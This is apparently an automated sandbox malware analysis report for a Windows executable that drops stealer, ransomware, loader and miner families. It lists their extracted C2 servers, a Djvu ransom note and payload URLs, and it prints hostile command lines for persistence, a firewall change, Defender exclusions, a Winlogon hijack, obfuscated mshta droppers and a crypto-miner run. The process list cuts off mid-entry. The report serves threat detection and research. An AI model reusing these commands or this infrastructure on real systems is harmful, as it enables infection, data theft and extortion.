Overview

overview

10

Static

static

040d9a95f9...e9.exe

windows7_x64

10

040d9a95f9...e9.exe

windows7_x64

10

040d9a95f9...e9.exe

windows7_x64

10

040d9a95f9...e9.exe

windows11_x64

10

040d9a95f9...e9.exe

windows10_x64

10

040d9a95f9...e9.exe

windows10_x64

10

040d9a95f9...e9.exe

windows10_x64

10

Resubmissions

08-11-2021 14:05

211108-rdywgshdbk 10

08-11-2021 13:46

211108-q2zl9ahcgq 10

Analysis

  • max time kernel
    212s
  • max time network
    308s
  • platform
    windows10_x64
  • resource
    win10-de-20211104
  • submitted
    08-11-2021 14:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    040d9a95f9e954e29ceb2469fcf3a9e9.exe

  • Size

    228KB

  • MD5

    040d9a95f9e954e29ceb2469fcf3a9e9

  • SHA1

    e04f9f919575e694dc4fe2f7f4646fc3440457b5

  • SHA256

    b6a1ce3e1d1dfa3057e7473c9219ba29218014de81c922ad38e96800c1f388e7

  • SHA512

    6fd2ae969ea6e3184929aa8e04a024432a135523a9508acf0372b2821660df1aace14a97de195101a6f2af0667ad4b7b64b60b3c414cac9a30079485f6bd4669

Score
10/10
djvuraccoonredlinesmokeloadertofseevidarxmrig5177068dec62c1db2959619dca43e02fa46ad7bd606400a741159db87f9df2b687764994c63c4c859ea476new2superstarz0rm1onzolosadbackdoordiscoveryevasioninfostealerminerpersistenceransomwarespywarestealersuricatatrojan

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://nalirou70.top/

http://xacokuo80.top/

http://nusurtal4f.net/

http://netomishnetojuk.net/

http://escalivrouter.net/

http://nick22doom4.net/

http://wrioshtivsio.su/

http://nusotiso4.su/

http://rickkhtovkka.biz/

http://palisotoliso.net/
rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

tofsee

C2

quadoil.ru

lakeflex.ru

Extracted

Family

redline

Botnet

new2

C2

93.115.20.139:28978

Extracted

Family

redline

Botnet

SuperStar

C2

185.215.113.29:36224

Extracted

Family

raccoon

Version

1.8.3

Botnet

a741159db87f9df2b687764994c63c4c859ea476

Attributes
  • url4cnc

    http://178.23.190.57/hiioBlacklight1

    http://91.219.236.162/hiioBlacklight1

    http://185.163.47.176/hiioBlacklight1

    http://193.38.54.238/hiioBlacklight1

    http://74.119.192.122/hiioBlacklight1

    http://91.219.236.240/hiioBlacklight1

    https://t.me/hiioBlacklight1

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

8dec62c1db2959619dca43e02fa46ad7bd606400

Attributes
  • url4cnc

    http://telegin.top/capibar

    http://ttmirror.top/capibar

    http://teletele.top/capibar

    http://telegalive.top/capibar

    http://toptelete.top/capibar

    http://telegraf.top/capibar

    https://t.me/capibar

rc4.plain
rc4.plain

Extracted

Family

djvu

C2

http://pqkl.org/lancer/get.php

Attributes
  • extension

    .irfk

  • offline_id

    7HKlLI6NrOQGMaTs5PqjvV1UcZ3VOcIeyFiH3Wt1

  • payload_url

    http://kotob.top/dl/build2.exe

    http://pqkl.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-dFmA3YqXzs Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0346uSifke

rsa_pubkey.plain

Extracted

Family

redline

Botnet

z0rm1on

C2

45.153.186.153:56675

Extracted

Family

vidar

Version

47.9

Botnet

517

C2

https://mas.to/@kirpich

Attributes
  • profile_id

    517

Extracted

Family

vidar

Version

47.9

Botnet

706

C2

https://mas.to/@kirpich

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

zolosad

C2

65.108.55.203:56717

Signatures

  • Detected Djvu ransomware 6 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

    ransomwaredjvu
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 7 IoCs
  • Registers COM server for autorun 1 TTPs
    persistence
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Windows security bypass 2 TTPs
    evasiontrojan
  • suricata: ET MALWARE Known Sinkhole Response Header

    suricata: ET MALWARE Known Sinkhole Response Header

    suricata
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Vidar Stealer 6 IoCs
    stealer
  • XMRig Miner Payload 3 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Executes dropped EXE 22 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Deletes itself 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies data under HKEY_USERS 19 IoCs
  • Modifies registry class 47 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\040d9a95f9e954e29ceb2469fcf3a9e9.exe
    "C:\Users\Admin\AppData\Local\Temp\040d9a95f9e954e29ceb2469fcf3a9e9.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4592
    • C:\Users\Admin\AppData\Local\Temp\040d9a95f9e954e29ceb2469fcf3a9e9.exe
      "C:\Users\Admin\AppData\Local\Temp\040d9a95f9e954e29ceb2469fcf3a9e9.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:4164
  • C:\Users\Admin\AppData\Local\Temp\F0F.exe
    C:\Users\Admin\AppData\Local\Temp\F0F.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1872
    • C:\Users\Admin\AppData\Local\Temp\F0F.exe
      C:\Users\Admin\AppData\Local\Temp\F0F.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:2424
  • C:\Users\Admin\AppData\Local\Temp\1DB6.exe
    C:\Users\Admin\AppData\Local\Temp\1DB6.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:3424
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ypbvqpxv\
      2⤵
        PID:1332
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ohsitqjc.exe" C:\Windows\SysWOW64\ypbvqpxv\
        2⤵
          PID:4224
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create ypbvqpxv binPath= "C:\Windows\SysWOW64\ypbvqpxv\ohsitqjc.exe /d\"C:\Users\Admin\AppData\Local\Temp\1DB6.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:4068
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description ypbvqpxv "wifi internet conection"
            2⤵
              PID:4780
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start ypbvqpxv
              2⤵
                PID:4952
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:4260
              • C:\Windows\SysWOW64\ypbvqpxv\ohsitqjc.exe
                C:\Windows\SysWOW64\ypbvqpxv\ohsitqjc.exe /d"C:\Users\Admin\AppData\Local\Temp\1DB6.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:4724
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:616
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2228
              • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.205.1003.0005\FileSyncConfig.exe
                "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.205.1003.0005\FileSyncConfig.exe"
                1⤵
                • Modifies registry class
                PID:4696
              • C:\Users\Admin\AppData\Local\Temp\73E1.exe
                C:\Users\Admin\AppData\Local\Temp\73E1.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:4576
              • C:\Users\Admin\AppData\Local\Temp\7F8A.exe
                C:\Users\Admin\AppData\Local\Temp\7F8A.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:3600
              • C:\Users\Admin\AppData\Local\Temp\E337.exe
                C:\Users\Admin\AppData\Local\Temp\E337.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:3084
                • C:\Users\Admin\AppData\Local\Temp\E337.exe
                  C:\Users\Admin\AppData\Local\Temp\E337.exe
                  2⤵
                  • Executes dropped EXE
                  PID:1864
              • C:\Users\Admin\AppData\Local\Temp\D2.exe
                C:\Users\Admin\AppData\Local\Temp\D2.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:2656
                • C:\Users\Admin\AppData\Local\Temp\D2.exe
                  C:\Users\Admin\AppData\Local\Temp\D2.exe
                  2⤵
                  • Executes dropped EXE
                  PID:5116
              • C:\Users\Admin\AppData\Local\Temp\DE3.exe
                C:\Users\Admin\AppData\Local\Temp\DE3.exe
                1⤵
                • Executes dropped EXE
                PID:5024
              • C:\Users\Admin\AppData\Local\Temp\4DFA.exe
                C:\Users\Admin\AppData\Local\Temp\4DFA.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:5060
                • C:\Users\Admin\AppData\Local\Temp\4DFA.exe
                  C:\Users\Admin\AppData\Local\Temp\4DFA.exe
                  2⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Modifies system certificate store
                  PID:4784
                  • C:\Windows\SysWOW64\icacls.exe
                    icacls "C:\Users\Admin\AppData\Local\a38da287-98ce-444c-9ffe-c087ea6b95e7" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                    3⤵
                    • Modifies file permissions
                    PID:1340
                  • C:\Users\Admin\AppData\Local\Temp\4DFA.exe
                    "C:\Users\Admin\AppData\Local\Temp\4DFA.exe" --Admin IsNotAutoStart IsNotTask
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:3424
                    • C:\Users\Admin\AppData\Local\Temp\4DFA.exe
                      "C:\Users\Admin\AppData\Local\Temp\4DFA.exe" --Admin IsNotAutoStart IsNotTask
                      4⤵
                      • Executes dropped EXE
                      PID:4272
                      • C:\Users\Admin\AppData\Local\e8ffa33c-35ea-42b9-974a-970649a2dfd6\build2.exe
                        "C:\Users\Admin\AppData\Local\e8ffa33c-35ea-42b9-974a-970649a2dfd6\build2.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:4628
                        • C:\Users\Admin\AppData\Local\e8ffa33c-35ea-42b9-974a-970649a2dfd6\build2.exe
                          "C:\Users\Admin\AppData\Local\e8ffa33c-35ea-42b9-974a-970649a2dfd6\build2.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:1776
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 1452
                            7⤵
                            • Program crash
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2116
              • C:\Users\Admin\AppData\Local\Temp\6627.exe
                C:\Users\Admin\AppData\Local\Temp\6627.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:3268
              • C:\Users\Admin\AppData\Local\Temp\9064.exe
                C:\Users\Admin\AppData\Local\Temp\9064.exe
                1⤵
                • Executes dropped EXE
                PID:3540
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3540 -s 920
                  2⤵
                  • Suspicious use of NtCreateProcessExOtherParentProcess
                  • Program crash
                  PID:4500
              • C:\Users\Admin\AppData\Local\Temp\BB7C.exe
                C:\Users\Admin\AppData\Local\Temp\BB7C.exe
                1⤵
                • Executes dropped EXE
                PID:4160
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\System32\mshta.exe" VbsCRIPt: CloSE ( CrEATEOBJECT ( "WscriPT.ShEll" ). rUn ( "C:\Windows\system32\cmd.exe /r cOPy /y ""C:\Users\Admin\AppData\Local\Temp\BB7C.exe"" ..\YGu6dRX.eXE && STart ..\YGU6DRX.exE -pEu3VPItrF6pCIFoPfAdI7 & iF """" == """" for %Q iN ( ""C:\Users\Admin\AppData\Local\Temp\BB7C.exe"" ) do taskkill /im ""%~nXQ"" -f ", 0 ,TRUe ) )
                  2⤵
                    PID:4336
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /r cOPy /y "C:\Users\Admin\AppData\Local\Temp\BB7C.exe" ..\YGu6dRX.eXE && STart ..\YGU6DRX.exE -pEu3VPItrF6pCIFoPfAdI7 & iF "" =="" for %Q iN ( "C:\Users\Admin\AppData\Local\Temp\BB7C.exe" ) do taskkill /im "%~nXQ" -f
                      3⤵
                        PID:1012
                        • C:\Users\Admin\AppData\Local\Temp\YGu6dRX.eXE
                          ..\YGU6DRX.exE -pEu3VPItrF6pCIFoPfAdI7
                          4⤵
                          • Executes dropped EXE
                          PID:4184
                          • C:\Windows\SysWOW64\mshta.exe
                            "C:\Windows\System32\mshta.exe" VbsCRIPt: CloSE ( CrEATEOBJECT ( "WscriPT.ShEll" ). rUn ( "C:\Windows\system32\cmd.exe /r cOPy /y ""C:\Users\Admin\AppData\Local\Temp\YGu6dRX.eXE"" ..\YGu6dRX.eXE && STart ..\YGU6DRX.exE -pEu3VPItrF6pCIFoPfAdI7 & iF ""-pEu3VPItrF6pCIFoPfAdI7 "" == """" for %Q iN ( ""C:\Users\Admin\AppData\Local\Temp\YGu6dRX.eXE"" ) do taskkill /im ""%~nXQ"" -f ", 0 ,TRUe ) )
                            5⤵
                              PID:512
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /r cOPy /y "C:\Users\Admin\AppData\Local\Temp\YGu6dRX.eXE" ..\YGu6dRX.eXE && STart ..\YGU6DRX.exE -pEu3VPItrF6pCIFoPfAdI7 & iF "-pEu3VPItrF6pCIFoPfAdI7 " =="" for %Q iN ( "C:\Users\Admin\AppData\Local\Temp\YGu6dRX.eXE" ) do taskkill /im "%~nXQ" -f
                                6⤵
                                  PID:4148
                              • C:\Windows\SysWOW64\mshta.exe
                                "C:\Windows\System32\mshta.exe" vbSCrIPt: ClosE ( CReatEoBJect ( "wSCRiPt.sHELl" ). rUN ( "CMd.EXE /q /R Echo | SET /p = ""MZ"" >G52~.M & cOpY /y /B g52~.M + MyDCSYS.aJ2 + SoLi.X + NlEYUAM.J + VrTf6S.Kuq + JAWQ.UF + 5CkHYa.YmN ..\FJ~iiI.s & DEL /q *& sTart control ..\FJ~iII.s " , 0 , tRue ))
                                5⤵
                                  PID:2880
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /q /R Echo | SET /p = "MZ" >G52~.M & cOpY /y /B g52~.M + MyDCSYS.aJ2 + SoLi.X + NlEYUAM.J + VrTf6S.Kuq + JAWQ.UF + 5CkHYa.YmN ..\FJ~iiI.s &DEL /q *& sTart control ..\FJ~iII.s
                                    6⤵
                                      PID:968
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" Echo "
                                        7⤵
                                          PID:2244
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>G52~.M"
                                          7⤵
                                            PID:2416
                                          • C:\Windows\SysWOW64\control.exe
                                            control ..\FJ~iII.s
                                            7⤵
                                              PID:1608
                                              • C:\Windows\SysWOW64\rundll32.exe
                                                "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\FJ~iII.s
                                                8⤵
                                                  PID:5100
                                                  • C:\Windows\system32\RunDll32.exe
                                                    C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\FJ~iII.s
                                                    9⤵
                                                      PID:6744
                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\FJ~iII.s
                                                        10⤵
                                                          PID:6168
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /im "BB7C.exe" -f
                                              4⤵
                                              • Kills process with taskkill
                                              PID:4508
                                      • C:\Users\Admin\AppData\Local\Temp\C8DB.exe
                                        C:\Users\Admin\AppData\Local\Temp\C8DB.exe
                                        1⤵
                                        • Executes dropped EXE
                                        PID:1872
                                      • C:\Users\Admin\AppData\Local\Temp\D33D.exe
                                        C:\Users\Admin\AppData\Local\Temp\D33D.exe
                                        1⤵
                                          PID:3976
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.youtube.com
                                            2⤵
                                              PID:4604
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.youtube.com
                                              2⤵
                                                PID:7024
                                            • C:\Users\Admin\AppData\Local\Temp\EDDA.exe
                                              C:\Users\Admin\AppData\Local\Temp\EDDA.exe
                                              1⤵
                                                PID:3080
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com
                                                  2⤵
                                                    PID:4568
                                                    • C:\Windows\SysWOW64\PING.EXE
                                                      "C:\Windows\system32\PING.EXE" twitter.com
                                                      3⤵
                                                      • Runs ping.exe
                                                      PID:860
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ipconfig /release
                                                    2⤵
                                                      PID:3964
                                                      • C:\Windows\SysWOW64\ipconfig.exe
                                                        "C:\Windows\system32\ipconfig.exe" /release
                                                        3⤵
                                                        • Gathers network information
                                                        PID:2272
                                                  • C:\Users\Admin\AppData\Local\Temp\FDAA.exe
                                                    C:\Users\Admin\AppData\Local\Temp\FDAA.exe
                                                    1⤵
                                                      PID:1360
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Local\chromedrlver.exe,"
                                                        2⤵
                                                          PID:3084
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Local\chromedrlver.exe,"
                                                            3⤵
                                                              PID:2968
                                                          • C:\Users\Admin\AppData\Local\chromedrlver.exe
                                                            "C:\Users\Admin\AppData\Local\chromedrlver.exe"
                                                            2⤵
                                                              PID:6596
                                                          • C:\Users\Admin\AppData\Local\Temp\1058.exe
                                                            C:\Users\Admin\AppData\Local\Temp\1058.exe
                                                            1⤵
                                                              PID:156
                                                              • C:\Users\Admin\AppData\Local\Temp\9d189eb8-10c5-450d-bb3d-0418ed56a713\AdvancedRun.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\9d189eb8-10c5-450d-bb3d-0418ed56a713\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\9d189eb8-10c5-450d-bb3d-0418ed56a713\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                2⤵
                                                                  PID:3136
                                                                  • C:\Users\Admin\AppData\Local\Temp\9d189eb8-10c5-450d-bb3d-0418ed56a713\AdvancedRun.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\9d189eb8-10c5-450d-bb3d-0418ed56a713\AdvancedRun.exe" /SpecialRun 4101d8 3136
                                                                    3⤵
                                                                      PID:4584
                                                                  • C:\Users\Admin\AppData\Local\Temp\6b62de7e-7699-418b-a991-3d21b6a0e203\AdvancedRun.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\6b62de7e-7699-418b-a991-3d21b6a0e203\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\6b62de7e-7699-418b-a991-3d21b6a0e203\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                    2⤵
                                                                      PID:4696
                                                                      • C:\Users\Admin\AppData\Local\Temp\6b62de7e-7699-418b-a991-3d21b6a0e203\AdvancedRun.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\6b62de7e-7699-418b-a991-3d21b6a0e203\AdvancedRun.exe" /SpecialRun 4101d8 4696
                                                                        3⤵
                                                                          PID:2768
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1058.exe" -Force
                                                                        2⤵
                                                                          PID:4116
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1058.exe" -Force
                                                                          2⤵
                                                                            PID:864
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1058.exe" -Force
                                                                            2⤵
                                                                              PID:3640
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
                                                                              2⤵
                                                                                PID:4684
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
                                                                                2⤵
                                                                                  PID:2072
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1058.exe" -Force
                                                                                  2⤵
                                                                                    PID:4552
                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe"
                                                                                    2⤵
                                                                                      PID:3624
                                                                                      • C:\Users\Admin\AppData\Local\Temp\0b9ea461-3e3e-4c95-9ceb-2afea5c8d0b9\AdvancedRun.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\0b9ea461-3e3e-4c95-9ceb-2afea5c8d0b9\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\0b9ea461-3e3e-4c95-9ceb-2afea5c8d0b9\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                        3⤵
                                                                                          PID:5712
                                                                                          • C:\Users\Admin\AppData\Local\Temp\0b9ea461-3e3e-4c95-9ceb-2afea5c8d0b9\AdvancedRun.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\0b9ea461-3e3e-4c95-9ceb-2afea5c8d0b9\AdvancedRun.exe" /SpecialRun 4101d8 5712
                                                                                            4⤵
                                                                                              PID:5928
                                                                                          • C:\Users\Admin\AppData\Local\Temp\5b2224bb-00d4-4da5-831f-063b105254a6\AdvancedRun.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\5b2224bb-00d4-4da5-831f-063b105254a6\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5b2224bb-00d4-4da5-831f-063b105254a6\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                            3⤵
                                                                                              PID:5752
                                                                                              • C:\Users\Admin\AppData\Local\Temp\5b2224bb-00d4-4da5-831f-063b105254a6\AdvancedRun.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\5b2224bb-00d4-4da5-831f-063b105254a6\AdvancedRun.exe" /SpecialRun 4101d8 5752
                                                                                                4⤵
                                                                                                  PID:5988
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
                                                                                                3⤵
                                                                                                  PID:5468
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
                                                                                                  3⤵
                                                                                                    PID:5428
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
                                                                                                    3⤵
                                                                                                      PID:5584
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force
                                                                                                      3⤵
                                                                                                        PID:5768
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
